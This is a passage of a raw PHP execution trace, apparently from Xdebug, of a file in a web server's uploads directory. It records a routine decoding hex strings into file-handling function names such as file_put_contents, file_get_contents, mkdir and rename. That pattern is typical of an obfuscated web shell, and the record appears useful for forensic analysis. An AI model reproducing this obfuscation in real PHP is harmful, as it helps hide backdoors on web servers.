3	237	0	0.010140	720232	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	237	1	0.010151	720272
3	237	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	238	0	0.010181	720264	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	238	1	0.010193	720312
3	238	R			108
3	239	0	0.010206	720232	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	239	1	0.010217	720272
3	239	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	240	0	0.010247	720264	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	240	1	0.010259	720312
3	240	R			101
3	241	0	0.010271	720232	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	241	1	0.010282	720272
3	241	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	242	0	0.010313	720264	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	242	1	0.010324	720312
3	242	R			95
3	243	0	0.010336	720232	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	243	1	0.010347	720272
3	243	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	244	0	0.010382	720264	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	244	1	0.010394	720312
3	244	R			112
3	245	0	0.010407	720232	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	245	1	0.010418	720272
3	245	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	246	0	0.010448	720264	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	246	1	0.010459	720312
3	246	R			117
3	247	0	0.010472	720232	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	247	1	0.010483	720272
3	247	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	248	0	0.010513	720264	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	248	1	0.010524	720312
3	248	R			116
3	249	0	0.010536	720232	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	249	1	0.010552	720272
3	249	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	250	0	0.010583	720272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	250	1	0.010594	720320
3	250	R			95
3	251	0	0.010607	720240	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	251	1	0.010618	720280
3	251	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	252	0	0.010648	720272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	252	1	0.010660	720320
3	252	R			99
3	253	0	0.010672	720240	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	253	1	0.010683	720280
3	253	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	254	0	0.010713	720272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	254	1	0.010724	720320
3	254	R			111
3	255	0	0.010737	720240	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	255	1	0.010748	720280
3	255	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	256	0	0.010778	720272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	256	1	0.010790	720320
3	256	R			110
3	257	0	0.010802	720240	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	257	1	0.010814	720280
3	257	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	258	0	0.010844	720272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	258	1	0.010855	720320
3	258	R			116
3	259	0	0.010868	720240	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	259	1	0.010879	720280
3	259	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	260	0	0.010909	720272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	260	1	0.010920	720320
3	260	R			101
3	261	0	0.010932	720240	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	261	1	0.010943	720280
3	261	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	262	0	0.010973	720272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	262	1	0.010984	720320
3	262	R			110
3	263	0	0.010997	720240	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	263	1	0.011008	720280
3	263	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	264	0	0.011038	720272	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	264	1	0.011050	720320
3	264	R			116
3	265	0	0.011062	720240	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	265	1	0.011073	720280
3	265	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	266	0	0.011103	720280	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	266	1	0.011114	720328
3	266	R			115
3	267	0	0.011127	720248	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	267	1	0.011138	720288
3	267	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	233	1	0.011168	720248
2	233	R			'file_put_contents'
1		A						/var/www/html/uploads/lCT.php	7	$func[13] = 'file_put_contents'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	268	0	0.011203	720248	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c655f6765745f636f6e74656e7473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 33
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	269	0	0.011245	720280	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	269	1	0.011256	720328
3	269	R			102
3	270	0	0.011269	720248	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	270	1	0.011283	720288
3	270	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	271	0	0.011313	720312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	271	1	0.011325	720360
3	271	R			105
3	272	0	0.011337	720280	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	272	1	0.011349	720320
3	272	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	273	0	0.011379	720312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	273	1	0.011390	720360
3	273	R			108
3	274	0	0.011403	720280	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	274	1	0.011414	720320
3	274	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	275	0	0.011444	720312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	275	1	0.011456	720360
3	275	R			101
3	276	0	0.011468	720280	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	276	1	0.011480	720320
3	276	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	277	0	0.011510	720312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	277	1	0.011521	720360
3	277	R			95
3	278	0	0.011534	720280	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	278	1	0.011545	720320
3	278	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	279	0	0.011576	720312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	279	1	0.011587	720360
3	279	R			103
3	280	0	0.011599	720280	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	280	1	0.011610	720320
3	280	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	281	0	0.011640	720312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	281	1	0.011652	720360
3	281	R			101
3	282	0	0.011665	720280	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	282	1	0.011676	720320
3	282	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	283	0	0.011706	720312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	283	1	0.011718	720360
3	283	R			116
3	284	0	0.011730	720280	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	284	1	0.011741	720320
3	284	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	285	0	0.011771	720320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	285	1	0.011783	720368
3	285	R			95
3	286	0	0.011795	720288	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	286	1	0.011806	720328
3	286	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	287	0	0.011836	720320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	287	1	0.011847	720368
3	287	R			99
3	288	0	0.011859	720288	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	288	1	0.011870	720328
3	288	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	289	0	0.011900	720320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	289	1	0.011912	720368
3	289	R			111
3	290	0	0.011925	720288	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	290	1	0.011936	720328
3	290	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	291	0	0.011966	720320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	291	1	0.011978	720368
3	291	R			110
3	292	0	0.011991	720288	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	292	1	0.012002	720328
3	292	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	293	0	0.012035	720320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	293	1	0.012047	720368
3	293	R			116
3	294	0	0.012059	720288	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	294	1	0.012071	720328
3	294	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	295	0	0.012101	720320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	295	1	0.012113	720368
3	295	R			101
3	296	0	0.012125	720288	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	296	1	0.012137	720328
3	296	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	297	0	0.012167	720320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	297	1	0.012178	720368
3	297	R			110
3	298	0	0.012190	720288	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	298	1	0.012201	720328
3	298	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	299	0	0.012231	720320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	299	1	0.012242	720368
3	299	R			116
3	300	0	0.012254	720288	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	300	1	0.012265	720328
3	300	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	301	0	0.012295	720328	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	301	1	0.012306	720376
3	301	R			115
3	302	0	0.012318	720296	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	302	1	0.012330	720336
3	302	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	268	1	0.012360	720296
2	268	R			'file_get_contents'
1		A						/var/www/html/uploads/lCT.php	7	$func[14] = 'file_get_contents'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	303	0	0.012395	720296	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6d6b646972'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 9
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	304	0	0.012435	720328	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	304	1	0.012446	720376
3	304	R			109
3	305	0	0.012459	720296	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	305	1	0.012471	720336
3	305	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	306	0	0.012501	720360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6b'
3	306	1	0.012514	720408
3	306	R			107
3	307	0	0.012526	720328	chr	0		/var/www/html/uploads/lCT.php	204	1	107
3	307	1	0.012538	720368
3	307	R			'k'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'k'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	308	0	0.012568	720360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	308	1	0.012579	720408
3	308	R			100
3	309	0	0.012592	720328	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	309	1	0.012603	720368
3	309	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	310	0	0.012633	720360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	310	1	0.012644	720408
3	310	R			105
3	311	0	0.012656	720328	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	311	1	0.012668	720368
3	311	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	312	0	0.012697	720360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	312	1	0.012708	720408
3	312	R			114
3	313	0	0.012721	720328	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	313	1	0.012732	720368
3	313	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	303	1	0.012766	720328
2	303	R			'mkdir'
1		A						/var/www/html/uploads/lCT.php	7	$func[15] = 'mkdir'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	314	0	0.012800	720328	dehex	1		/var/www/html/uploads/lCT.php	7	1	'72656e616d65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	315	0	0.012840	720360	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	315	1	0.012852	720408
3	315	R			114
3	316	0	0.012864	720328	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	316	1	0.012876	720368
3	316	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	317	0	0.012906	720392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	317	1	0.012917	720440
3	317	R			101
3	318	0	0.012930	720360	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	318	1	0.012942	720400
3	318	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	319	0	0.012972	720392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	319	1	0.012983	720440
3	319	R			110
3	320	0	0.012996	720360	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	320	1	0.013006	720400
3	320	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	321	0	0.013037	720392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	321	1	0.013048	720440
3	321	R			97
3	322	0	0.013061	720360	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	322	1	0.013072	720400
3	322	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	323	0	0.013103	720392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	323	1	0.013114	720440
3	323	R			109
3	324	0	0.013127	720360	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	324	1	0.013138	720400
3	324	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	325	0	0.013214	720392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	325	1	0.013226	720440
3	325	R			101
3	326	0	0.013238	720360	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	326	1	0.013250	720400
3	326	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	314	1	0.013280	720360
2	314	R			'rename'
1		A						/var/www/html/uploads/lCT.php	7	$func[16] = 'rename'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	327	0	0.013313	720360	dehex	1		/var/www/html/uploads/lCT.php	7	1	'737472746f74696d65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 17
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	328	0	0.013355	720392	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	328	1	0.013366	720440
3	328	R			115
3	329	0	0.013378	720360	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	329	1	0.013390	720400
3	329	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	330	0	0.013421	720424	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	330	1	0.013432	720472
3	330	R			116
3	331	0	0.013444	720392	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	331	1	0.013455	720432
3	331	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	332	0	0.013486	720424	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	332	1	0.013497	720472
3	332	R			114
3	333	0	0.013509	720392	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	333	1	0.013525	720432
3	333	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	334	0	0.013556	720424	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	334	1	0.013567	720472
3	334	R			116
3	335	0	0.013580	720392	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	335	1	0.013591	720432
3	335	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	336	0	0.013621	720424	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	336	1	0.013633	720472
3	336	R			111
3	337	0	0.013645	720392	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	337	1	0.013656	720432
3	337	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	338	0	0.013686	720424	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	338	1	0.013697	720472
3	338	R			116
3	339	0	0.013709	720392	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	339	1	0.013721	720432
3	339	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	340	0	0.013750	720424	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	340	1	0.013762	720472
3	340	R			105
3	341	0	0.013774	720392	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	341	1	0.013785	720432
3	341	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	342	0	0.013815	720424	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	342	1	0.013827	720472
3	342	R			109
3	343	0	0.013839	720392	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	343	1	0.013850	720432
3	343	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	344	0	0.013880	720432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	344	1	0.013891	720480
3	344	R			101
3	345	0	0.013903	720400	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	345	1	0.013914	720440
3	345	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	327	1	0.013944	720400
2	327	R			'strtotime'
1		A						/var/www/html/uploads/lCT.php	7	$func[17] = 'strtotime'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	346	0	0.013979	720400	dehex	1		/var/www/html/uploads/lCT.php	7	1	'68746d6c7370656369616c6368617273'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 31
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	347	0	0.014020	720432	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	347	1	0.014031	720480
3	347	R			104
3	348	0	0.014044	720400	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	348	1	0.014055	720440
3	348	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	349	0	0.014086	720464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	349	1	0.014097	720512
3	349	R			116
3	350	0	0.014110	720432	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	350	1	0.014121	720472
3	350	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	351	0	0.014151	720464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	351	1	0.014162	720512
3	351	R			109
3	352	0	0.014175	720432	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	352	1	0.014186	720472
3	352	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	353	0	0.014216	720464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	353	1	0.014227	720512
3	353	R			108
3	354	0	0.014239	720432	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	354	1	0.014253	720472
3	354	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	355	0	0.014283	720464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	355	1	0.014294	720512
3	355	R			115
3	356	0	0.014307	720432	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	356	1	0.014317	720472
3	356	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	357	0	0.014347	720464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	357	1	0.014358	720512
3	357	R			112
3	358	0	0.014370	720432	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	358	1	0.014388	720472
3	358	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	359	0	0.014424	720464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	359	1	0.014435	720512
3	359	R			101
3	360	0	0.014448	720432	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	360	1	0.014459	720472
3	360	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	361	0	0.014489	720464	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	361	1	0.014500	720512
3	361	R			99
3	362	0	0.014512	720432	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	362	1	0.014523	720472
3	362	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	363	0	0.014554	720472	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	363	1	0.014564	720520
3	363	R			105
3	364	0	0.014577	720440	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	364	1	0.014587	720480
3	364	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	365	0	0.014617	720472	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	365	1	0.014628	720520
3	365	R			97
3	366	0	0.014641	720440	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	366	1	0.014651	720480
3	366	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	367	0	0.014682	720472	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	367	1	0.014693	720520
3	367	R			108
3	368	0	0.014706	720440	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	368	1	0.014717	720480
3	368	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	369	0	0.014747	720472	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	369	1	0.014758	720520
3	369	R			99
3	370	0	0.014770	720440	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	370	1	0.014781	720480
3	370	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	371	0	0.014811	720472	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	371	1	0.014822	720520
3	371	R			104
3	372	0	0.014834	720440	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	372	1	0.014844	720480
3	372	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	373	0	0.014874	720472	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	373	1	0.014885	720520
3	373	R			97
3	374	0	0.014897	720440	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	374	1	0.014907	720480
3	374	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	375	0	0.014937	720472	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	375	1	0.014947	720520
3	375	R			114
3	376	0	0.014960	720440	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	376	1	0.014970	720480
3	376	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	377	0	0.015004	720472	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	377	1	0.015015	720520
3	377	R			115
3	378	0	0.015028	720440	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	378	1	0.015039	720480
3	378	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	346	1	0.015069	720448
2	346	R			'htmlspecialchars'
1		A						/var/www/html/uploads/lCT.php	7	$func[18] = 'htmlspecialchars'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	379	0	0.015104	720448	dehex	1		/var/www/html/uploads/lCT.php	7	1	'64617465'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 7
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	380	0	0.015145	720480	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	380	1	0.015157	720528
3	380	R			100
3	381	0	0.015169	720448	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	381	1	0.015180	720488
3	381	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
